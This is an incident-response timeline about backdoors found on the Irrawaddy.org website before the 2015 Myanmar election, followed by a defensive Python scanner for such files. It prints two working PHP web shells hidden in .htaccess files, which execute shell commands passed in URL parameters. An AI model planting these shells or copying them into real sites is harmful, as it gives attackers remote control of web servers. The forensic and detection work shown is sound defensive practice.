7th Nov 15:00 PM – The IP address was involved in the October attacks!
Irrawaddy.org confirms that the very same IP address was involved in the attack on their website on 9 October 2015 by the group “Union of Hacktivists”.
7th Nov 16:30 PM – Looking for backdoors in the website
We received access credentials to look for backdoors in the website. The case is urgent, as Election Day starts in less than 12 hours.
7th Nov 17:30 PM – No obvious evidence of malicious activity
Irrawaddy.org communicates that they believe there are no clear signs that the site is compromised, as the previous hack attempt was cleaned up by their current hosting provider.
7th Nov 17:52 PM – First backdoor found!
We found the first backdoor in the website. The backdoor executes shell commands passed in the URI through the query variable “1”: in PHP, a string enclosed in backticks is executed as a shell command, and the short echo tag prints its output back in the response.
# cat feed/.htaccess
Order allow,deny
Allow from all
AddType application/x-httpd-php .htaccess
<?=@`$_GET[1]`?>
7th Nov 19:34 PM – More backdoors…
Two earlier attempts to backdoor the site are found:
wp-content/uploads/2015/01/htaccess (Jan 20 2015)
wp-content/staticfeed/htaccess (Jan 10 2015)
# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^.ht">
Order allow,deny
Allow from all
</Files>
# Make .htaccess file be interpreted as php file. This occurs after apache has interpreted
# the apache directives from the .htaccess file
AddType application/x-httpd-php .htaccess .gif .phtml .jpeg .png .txt .php5 .php3
<?php echo "\n";passthru($_GET['c']." 2>&1");?>
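As an added example (not part of the original write-up), a Python scanner that flags the indicators the two shells above share: PHP open tags inside an .htaccess, an AddType that hands .htaccess or image/text extensions to the PHP handler, a Files block that re-grants access to .ht* files, and command execution fed from request parameters. The sample file contents are reconstructed from the page; the function names and the directory walk are assumptions.

```python
import os
import re

# Indicators shared by the two .htaccess web shells described above: a legitimate
# .htaccess never contains PHP code and never maps itself to the PHP handler.
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
PHP_HANDLER = re.compile(r"^\s*AddType\s+application/x-httpd-php\s+(.+)$", re.IGNORECASE | re.MULTILINE)
# A <Files>/<FilesMatch> block aimed at .ht* files whose body grants access (undoes Apache's default deny)
DOTFILE_BLOCK = re.compile(r"<Files(?:Match)?\s+[^>]*\.ht[^>]*>(.*?)</Files(?:Match)?>", re.IGNORECASE | re.DOTALL)
GRANT_ALL = re.compile(r"allow\s+from\s+all|require\s+all\s+granted", re.IGNORECASE)
SHELL_EXEC = re.compile(r"passthru\s*\(|shell_exec\s*\(|\bsystem\s*\(|\bexec\s*\(|`[^`]*\$_(?:GET|POST|REQUEST)", re.IGNORECASE)
NON_PHP_EXT = {".htaccess", ".gif", ".jpeg", ".jpg", ".png", ".txt"}  # must never reach the PHP interpreter


def scan_htaccess(text: str) -> list[str]:
    """Return the indicators found in the content of one .htaccess-style file."""
    findings = []
    if PHP_OPEN_TAG.search(text):
        findings.append("php-code-in-htaccess")
    if any({e.lower() for e in m.group(1).split()} & NON_PHP_EXT for m in PHP_HANDLER.finditer(text)):
        findings.append("php-handler-on-non-php-extension")
    if any(GRANT_ALL.search(m.group(1)) for m in DOTFILE_BLOCK.finditer(text)):
        findings.append("dotfile-access-override")
    if SHELL_EXEC.search(text):
        findings.append("shell-execution-from-request")
    return findings


def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk a web root; report every .htaccess (or 'htaccess', as in the uploads/ finds) with indicators."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower() in (".htaccess", "htaccess"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = scan_htaccess(fh.read())
                if findings:
                    report[path] = findings
    return report


# Constructed samples: the two shells quoted on the page and a benign WordPress .htaccess.
FEED_SHELL = "Order allow,deny\nAllow from all\nAddType application/x-httpd-php .htaccess\n<?=@`$_GET[1]`?>\n"
HTSHELL = ('<Files ~ "^.ht">\nOrder allow,deny\nAllow from all\n</Files>\n'
           "AddType application/x-httpd-php .htaccess .gif .phtml .jpeg .png .txt .php5 .php3\n"
           "<?php echo \"\\n\";passthru($_GET['c'].\" 2>&1\");?>\n")
BENIGN = ("<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteRule . /index.php [L]\n</IfModule>\n"
          "<Files .htaccess>\nOrder allow,deny\nDeny from all\n</Files>\n")

if __name__ == "__main__":
    for label, sample in (("feed/.htaccess", FEED_SHELL), ("htshell", HTSHELL), ("wordpress", BENIGN)):
        print(label, scan_htaccess(sample) or "clean")
```

Running `scan_tree("/var/www/html")` (path assumed) over a WordPress install returns only the files that carry at least one indicator; the benign hardening block that denies access to .htaccess is deliberately not flagged.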